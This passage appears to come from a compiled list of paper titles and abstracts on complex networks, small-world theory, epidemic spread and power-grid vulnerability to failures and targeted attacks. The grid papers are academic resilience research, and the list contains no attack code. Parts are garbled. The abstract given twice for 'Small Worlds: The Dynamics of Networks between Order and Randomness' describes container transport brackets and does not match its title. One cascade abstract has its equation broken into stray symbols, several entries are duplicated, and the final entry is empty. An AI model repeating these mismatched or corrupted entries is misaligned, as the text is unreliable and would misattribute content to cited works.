emerging epidemic pathways. Simulation results are in agreement with the empirical data of the SARS worldwide epidemic.ConclusionThe presented computational approach shows that the integration of long-range mobility and demographic data provides epidemic models with a predictive power that can be consistently tested and theoretically motivated. This computational strategy can be therefore considered as a general tool in the analysis and forecast of the global spreading of emerging diseases and in the definition of containment policies aimed at reducing the effects of potentially catastrophic outbreaks. --- paper_title: Analysis of the Nordel power grid disturbance of January 1, 1997 using trajectory sensitivities paper_content: This paper uses trajectory sensitivity analysis to investigate a major disturbance of the Nordel power system which occurred on January 1, 1997. The Nordel system is described, and the details of the disturbance are presented. Background to trajectory sensitivity analysis is also provided. Results of the investigation indicate the usefulness of trajectory sensitivities for exploring the influence of various system parameters on the large disturbance behaviour of the system. The trajectory sensitivities provide a way of judging the relative importance of various factors which affected behaviour. --- paper_title: Network Topology of a Potential Energy Landscape: A Static Scale-Free Network paper_content: Here we analyze the topology of the network formed by the minima and transition states on the potential energy landscape of small clusters. We find that this network has both a small-world and scale-free character. In contrast to other scale-free networks, where the topology results from the dynamics of the network growth, the potential energy landscape is a static entity. Therefore, a fundamentally different organizing principle underlies this behavior: The potential energy landscape is highly heterogeneous with the low-energy minima having large basins of attraction and acting as the highly connected hubs in the network. --- paper_title: Prediction and predictability of global epidemics: the role of the airline transportation network paper_content: The systematic study of large-scale networks has unveiled the ubiquitous presence of connectivity patterns characterized by large scale heterogeneities and unbounded statistical fluctuations. These features affect dramatically the behavior of the diffusion processes occurring on networks, determining the ensuing statistical properties of their evolution pattern and dynamics. In this paper, we investigate the role of the large scale properties of the airline transportation network in determining the global evolution of emerging disease. We present a stochastic computational framework for the forecast of global epidemics that considers the complete world-wide air travel infrastructure complemented with census population data. We address two basic issues in global epidemic modeling: i) We study the role of the large scale properties of the airline transportation network in determining the global diffusion pattern of emerging diseases; ii) We evaluate the reliability of forecasts and outbreak scenarios with respect to the intrinsic stochasticity of disease transmission and traffic flows. In order to address these issues we define a set of novel quantitative measures able to characterize the level of heterogeneity and predictability of the epidemic pattern. These measures may be used for the analysis of containment policies and epidemic risk assessment. --- paper_title: An Experimental Study of the Small World Problem paper_content: Arbitrarily selected individuals (N=296) in Nebraska and Boston are asked to generate acquaintance chains to a target person in Massachusetts, employing “the small world method” (Milgram, 1967). Sixty-four chains reach the target person. Within this group the mean number of intermediaries between starters and targets is 5.2. Boston starting chains reach the target person with fewer intermediaries than those starting in Nebraska; subpopulations in the Nebraska group do not differ among themselves. The funneling of chains through sociometric “stars” is noted, with 48 per cent of the chains passing through three persons before reaching the target. Applications of the method to studies of large scale social structure are discussed. --- paper_title: Directed-graph epidemiological models of computer viruses paper_content: The strong analogy between biological viruses and their computational counterparts has motivated the authors to adapt the techniques of mathematical epidemiology to the study of computer virus propagation. In order to allow for the most general patterns of program sharing, a standard epidemiological model is extended by placing it on a directed graph and a combination of analysis and simulation is used to study its behavior. The conditions under which epidemics are likely to occur are determined, and, in cases where they do, the dynamics of the expected number of infected individuals are examined as a function of time. It is concluded that an imperfect defense against computer viruses can still be highly effective in preventing their widespread proliferation, provided that the infection rate does not exceed a well-defined critical epidemic threshold. > --- paper_title: On power-law relationships of the Internet topology paper_content: Despite the apparent randomness of the Internet, we discover some surprisingly simple power-laws of the Internet topology. These power-laws hold for three snapshots of the Internet, between November 1997 and December 1998, despite a 45% growth of its size during that period. We show that our power-laws fit the real data very well resulting in correlation coefficients of 96% or higher.Our observations provide a novel perspective of the structure of the Internet. The power-laws describe concisely skewed distributions of graph properties such as the node outdegree. In addition, these power-laws can be used to estimate important parameters such as the average neighborhood size, and facilitate the design and the performance analysis of protocols. Furthermore, we can use them to generate and select realistic topologies for simulation purposes. --- paper_title: Error and Attack Tolerance of Complex Networks paper_content: Communication/transportation systems are often subjected to failures and attacks. Here we represent such systems as networks and we study their ability to resist failures (attacks) simulated as the breakdown of a group of nodes of the network chosen at random (chosen accordingly to degree or load). We consider and compare the results for two different network topologies: the Erdos–Renyi random graph and the Barabasi–Albert scale-free network. We also discuss briefly a dynamical model recently proposed to take into account the dynamical redistribution of loads after the initial damage of a single node of the network. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Modeling blackout dynamics in power transmission networks with simple structure paper_content: A model for blackouts in electric power transmission systems is implemented and studied in simple networks with a regular structure. The model describes load demand and network improvements evolving on a slow timescale as well as the fast dynamics of cascading overloads and outages. The model dynamics are demonstrated on the simple power system networks. The dynamics depend weakly on the network topologies tested. The probability distribution functions of measures of the cascading events show the existence of power-dependent tails. --- paper_title: Exploring complex networks paper_content: The study of networks pervades all of science, from neurobiology to statistical physics. The most basic issues are structural: how does one characterize the wiring diagram of a food web or the Internet or the metabolic network of the bacterium Escherichia coli? Are there any unifying principles underlying their topology? From the perspective of nonlinear dynamics, we would also like to understand how an enormous network of interacting dynamical systems — be they neurons, power stations or lasers — will behave collectively, given their individual dynamics and coupling architecture. Researchers are only now beginning to unravel the structure and dynamics of complex networks. --- paper_title: Network topology of the interbank market paper_content: We provide an empirical analysis of the network structure of the Austrian interbank market based on Austrian Central Bank (OeNB) data. The interbank market is interpreted as a network where banks are nodes and the claims and liabilities between banks define the links. This allows us to apply methods from general network theory. We find that the degree distributions of the interbank network follow power laws. Given this result we discuss how the network structure affects the stability of the banking system with respect to the elimination of a node in the network, i.e. the default of a single bank. Further, the interbank liability network shows a community structure that exactly mirrors the regional and sectoral organization of the current Austrian banking system. The banking network has the typical structural features found in numerous other complex real-world networks: a low clustering coefficient and a short average path length. These empirical findings are in marked contrast to the network structures that have been assumed thus far in the theoretical economic and econo-physics literature. --- paper_title: The large-scale organization of metabolic networks paper_content: In a cell or microorganism, the processes that generate mass, energy, information transfer and cell-fate specification are seamlessly integrated through a complex network of cellular constituents and reactions1. However, despite the key role of these networks in sustaining cellular functions, their large-scale structure is essentially unknown. Here we present a systematic comparative mathematical analysis of the metabolic networks of 43 organisms representing all three domains of life. We show that, despite significant variation in their individual constituents and pathways, these metabolic networks have the same topological scaling properties and show striking similarities to the inherent organization of complex non-biological systems2. This may indicate that metabolic organization is not only identical for all living organisms, but also complies with the design principles of robust and error-tolerant scale-free networks2,3,4,5, and may represent a common blueprint for the large-scale organization of interactions among all cellular constituents. --- paper_title: Is the Boston Subway a Small-World Network? paper_content: The mathematical study of the small-world concept has fostered quite some interest, showing that small-world features can be identified for some abstract classes of networks. However, passing to real complex systems, as for instance transportation networks, shows a number of new problems that make current analysis impossible. In this paper we show how a more refined kind of analysis, relying on transportation efficiency, can in fact be used to overcome such problems, and to give precious insights on the general characteristics of real transportation networks, eventually providing a picture where the small-world comes back as underlying construction principle. --- paper_title: Global disease spread: statistics and estimation of arrival times paper_content: We study metapopulation models for the spread of epidemics in which different subpopulations (cities) are connected by fluxes of individuals (travelers). This framework allows one to describe the spread of a disease on a large scale and we focus here on the computation of the arrival time of a disease as a function of the properties of the seed of the epidemics and of the characteristics of the network connecting the various subpopulations. Using analytical and numerical arguments, we introduce an easily computable quantity which approximates this average arrival time. We show on the example of a disease spread on the world-wide airport network that this quantity predicts with a good accuracy the order of arrival of the disease in the various subpopulations in each realization of epidemic scenario, and not only for an average over realizations. Finally, this quantity might be useful in the identification of the dominant paths of the disease spread. --- paper_title: Stochastic Model for Power Grid Dynamics paper_content: We introduce a stochastic model that describes the quasi-static dynamics of an electric transmission network under perturbations introduced by random load fluctuations, random removing of system components from service, random repair times for the failed components, and random response times to implement optimal system corrections for removing line overloads in a damaged or stressed transmission network. We use a linear approximation to the network flow equations and apply linear programming techniques that optimize the dispatching of generators and loads in order to eliminate the network overloads associated with a damaged system. We also provide a simple model for the operator's response to various contingency events that is not always optimal due to either failure of the state estimation system or due to the incorrect subjective assessment of the severity associated with these events. This further allows us to use a game theoretic framework for casting the optimization of the operator's response into the choice of the optimal strategy which minimizes the operating cost. We use a simple strategy space which is the degree of tolerance to line overloads and which is an automatic control (optimization) parameter that can be adjusted to trade off automatic load shed without propagating cascades versus reduced load shed and an increased risk of propagating cascades. The tolerance parameter is chosen to describes a smooth transition from a risk averse to a risk taken strategy. We present numerical results comparing the responses of two power grid systems to optimization approaches with different factors of risk and select the best blackout controlling parameter --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: Transport brackets are affixed to the container and include provisions for achieving transportability with either a crane or a fork lift. Variable storage capacity is provided by an extension bin which is detachably affixed as part of the container. The top and bottom of the container are compatibly configured to provide an interlock between a plurality of stacked containers and a dolly is configured for use with these interlocking provisions. The container is configured to achieve stacking interchangeability when any vertically peripheral sides are aligned and brackets are disposed around the vertical periphery of the container to achieve fork lift accessibility from any direction perpendicular to the vertically peripheral sides. --- paper_title: An Experimental Study of the Small World Problem paper_content: Arbitrarily selected individuals (N=296) in Nebraska and Boston are asked to generate acquaintance chains to a target person in Massachusetts, employing “the small world method” (Milgram, 1967). Sixty-four chains reach the target person. Within this group the mean number of intermediaries between starters and targets is 5.2. Boston starting chains reach the target person with fewer intermediaries than those starting in Nebraska; subpopulations in the Nebraska group do not differ among themselves. The funneling of chains through sociometric “stars” is noted, with 48 per cent of the chains passing through three persons before reaching the target. Applications of the method to studies of large scale social structure are discussed. --- paper_title: Error and Attack Tolerance of Complex Networks paper_content: Communication/transportation systems are often subjected to failures and attacks. Here we represent such systems as networks and we study their ability to resist failures (attacks) simulated as the breakdown of a group of nodes of the network chosen at random (chosen accordingly to degree or load). We consider and compare the results for two different network topologies: the Erdos–Renyi random graph and the Barabasi–Albert scale-free network. We also discuss briefly a dynamical model recently proposed to take into account the dynamical redistribution of loads after the initial damage of a single node of the network. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: The very small world of the well-connected paper_content: Online networks occupy an increasingly larger position in how we acquire information, how we communicate with one another, and how we disseminate information. Frequently, small sets of vertices dominate various graph and statistical properties of these networks and, because of this, they are relevant for structural analysis and efficient algorithms and engineering. For the web overall, and specifically for social linking in blogs and instant messaging, we provide a principled, rigorous study of the properties, the construction, and the utilization of subsets of special vertices in large online networks. We show that graph synopses defined by the importance of vertices provide small, relatively accurate portraits, independent of the importance measure, of the larger underlying graphs and of the important vertices. Furthermore, they can be computed relatively efficiently. --- paper_title: Topology of technology graphs: small world patterns in electronic circuits. paper_content: Recent theoretical studies and extensive data analyses have revealed a common feature displayed by biological, social, and technological networks: the presence of small world patterns. Here we analyze this problem by using several graphs obtained from one of the most common technological systems: electronic circuits. It is shown that both analogic and digital circuits exhibit small world behavior. We conjecture that the small world pattern arises from the compact design in which many elements share a small, close physical neighborhood plus the fact that the system must define a single connected component (which requires shortcuts connecting different integrated clusters). The degree distributions displayed are consistent with a conjecture concerning the sharp cutoffs associated to the presence of costly connections [Amaral et al., Proc. Natl. Acad. Sci. USA 97, 11 149 (2000)], thus providing a limit case for the classes of universality of small world patterns from real, artificial networks. The consequences for circuit design are outlined. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Cascade-based attack vulnerability on the US power grid paper_content: The vulnerability of real-life networks subject to intentional attacks has been one of the outstanding challenges in the study of the network safety. Applying the real data of the US power grid, we compare the effects of two different attacks for the network robustness against cascading failures, i.e., removal by either the descending or ascending orders of the loads. Adopting the initial load of a node j to be Lj !" kj# Rm2Cj km$% a with kj and Cj being the degree of the node j and the set of its neighboring nodes, respectively, where a is a tunable parameter and governs the strength of the initial load of a node, we investigate the response of the US power grid under two attacks during the cascading propagation. In the case of a < 0:7, our investigation by the numerical simulations leads to a counterintuitive finding on the US power grid that the attack on the nodes with the lowest loads is more harmful than the attack on the ones with the highest loads. In addition, the almost same effect of two attacks in the case ofa ! 0:7 may be useful in furthering studies on the control and defense of cascading failures in the US power grid. --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. In this paper, the models of components in the power grid are constructed detailedly, furthermore the weighted and directional graph is provided. First, the connecting formings among buses (instead in the traditional methods only substations are considered), lines, transformers and generators are simulated detailedly. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. At last, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Critical node identification of smart power system using complex network framework based centrality approach paper_content: A method of critical node identification in a power system is presented in this paper. Maximum flow in a network is used to measure centrality of various nodes in the power system. The proposed approach is an improvement of previous methodology in the sense that it does not take into consideration shortest electrical distance as path to flow power. Instead of using normal steady-state condition maximum possible flow is considered. Simulation of various standard test systems are carried out to identify critical nodes. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades. Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: Transport brackets are affixed to the container and include provisions for achieving transportability with either a crane or a fork lift. Variable storage capacity is provided by an extension bin which is detachably affixed as part of the container. The top and bottom of the container are compatibly configured to provide an interlock between a plurality of stacked containers and a dolly is configured for use with these interlocking provisions. The container is configured to achieve stacking interchangeability when any vertically peripheral sides are aligned and brackets are disposed around the vertical periphery of the container to achieve fork lift accessibility from any direction perpendicular to the vertically peripheral sides. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Publicat originalment a: WIT transactions on ecology and the environment, 2009, vol. 121, p. 527-537 --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and vertices and further analysis can help in identifying the important lines. This paper proposes a new betweenness index using the reactance of the transmission lines as the weight and criteria to measure of vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. More power is transmitted along the lines with less reactance, to reach from the source node to destination node, which gives the edges with less reactance a higher weight in the analysis. The analyzes have been carried out on the IEEE 39 bus system and IEEE 118 Bus System. The new betweenness index can identify the critical lines of the system, either due to their position in the network or by the power they transmit along the network. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: The Improvement of the Small-world Network Model and Its Application Research in Bulk Power System paper_content: Due to the complexity of cascading failures and blackouts, the small world theory for complex network research is employed in probing the mechanism of them. In the paper, the original small world network model has been modified in two ways. Firstly, the magnitude of the line impedance regarded as the weight of edges is taken into consideration which is not considered in the original model. The formulae of corresponding parameters of the model are also modified. The calculation results of some practical grids validate the correctness and effectiveness of the new model. Secondly, the complex number format of power flow is introduced as the network flow in the small world model. With the power flow and the topology of grids, the two main factors to the system vulnerability, considered, the improved small world model can be used as a tool for vulnerability analysis of grids. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: LOCATING CRITICAL LINES IN HIGH-VOLTAGE ELECTRICAL POWER GRIDS paper_content: Electrical power grids are among the infrastructures that are attracting a great deal of attention because of their intrinsic criticality. Here we analyze the topological vulnerability and improvability of the spanish 400 kV, the french 400 kV and the italian 380 kV power transmission grids. For each network we detect the most critical lines and suggest how to improve the connectivity. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Vulnerability Assessment of Power Grid Using Graph Topological Indices paper_content: This paper presents an assessment of the vulnerability of the power grid to blackout using graph topological indexes. Based on a FERC 715 report and the outage reports, the cascading faults of summer WSCC 1996 are reconstructed, and the graphical property of the grid is compared between two cases: when the blackout triggering lines are removed simulating the actual sequence of cascading outages and when the same number of randomly selected lines are removed. The investigation finds that the critical path lengths of the triggering events of the July and August outages of 1996 WSCC blackout are higher than those of no-outage and arbitrary events. In addition, the small world-ness index for each of the outage triggering events is much smaller than that of normal or any no-outage scenario, indicating that events of shifting a network from small world to a random network would be more likely cascaded to wide area outage. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: 